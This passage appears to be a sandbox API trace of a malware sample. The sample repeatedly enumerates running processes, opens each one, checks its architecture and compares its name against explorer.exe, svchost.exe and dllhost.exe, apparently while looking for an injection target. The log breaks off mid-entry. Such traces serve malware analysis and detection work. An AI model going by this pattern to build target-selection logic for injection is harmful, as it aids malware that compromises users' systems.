[0257.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0257.542] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.542] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.542] CloseHandle (hObject=0xec) returned 1 [0257.542] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0257.542] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0257.542] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0257.542] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0257.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0257.542] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.542] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.542] CloseHandle (hObject=0xec) returned 1 [0257.542] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0257.542] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0257.542] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0257.543] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0257.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0257.543] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.543] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.543] CloseHandle (hObject=0xec) returned 1 [0257.543] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0257.543] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0257.543] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0257.543] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0257.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0257.544] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.544] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.544] CloseHandle (hObject=0xec) returned 1 [0257.544] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0257.544] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0257.544] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0257.544] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0257.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0257.544] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.544] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.544] CloseHandle (hObject=0xec) returned 1 [0257.544] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0257.544] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0257.545] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0257.545] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0257.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0257.545] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.545] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.545] CloseHandle (hObject=0xec) returned 1 [0257.545] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0257.545] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0257.545] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0257.545] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0257.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0257.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0257.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0257.547] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0257.547] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0257.548] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0257.548] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.548] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.548] CloseHandle (hObject=0xec) returned 1 [0257.548] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0257.549] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.549] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.549] CloseHandle (hObject=0xec) returned 1 [0257.549] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0257.550] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.550] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.550] CloseHandle (hObject=0xec) returned 1 [0257.550] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0257.550] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0257.550] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.550] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.550] CloseHandle (hObject=0xec) returned 1 [0257.550] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.551] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0257.551] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.551] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.551] CloseHandle (hObject=0xec) returned 1 [0257.551] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0257.552] CloseHandle (hObject=0xe8) returned 1 [0257.552] Sleep (dwMilliseconds=0x3e8) [0258.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0258.588] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0258.588] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0258.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0258.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0258.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0258.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0258.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0258.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0258.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0258.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0258.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0258.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0258.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0258.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0258.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0258.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0258.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0258.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0258.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0258.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0258.598] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.598] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.598] CloseHandle (hObject=0xec) returned 1 [0258.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0258.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0258.599] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.599] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.599] CloseHandle (hObject=0xec) returned 1 [0258.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0258.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0258.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0258.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0258.600] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.601] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.601] CloseHandle (hObject=0xec) returned 1 [0258.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0258.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0258.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0258.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0258.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0258.601] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.601] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.601] CloseHandle (hObject=0xec) returned 1 [0258.601] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0258.601] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0258.601] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0258.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0258.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0258.602] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.602] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.602] CloseHandle (hObject=0xec) returned 1 [0258.602] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0258.602] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0258.602] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0258.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0258.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0258.603] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.603] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.603] CloseHandle (hObject=0xec) returned 1 [0258.603] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0258.603] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0258.603] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0258.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0258.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0258.603] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.603] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0258.603] CloseHandle (hObject=0xec) returned 1 [0258.603] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0258.603] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0258.603] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0258.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 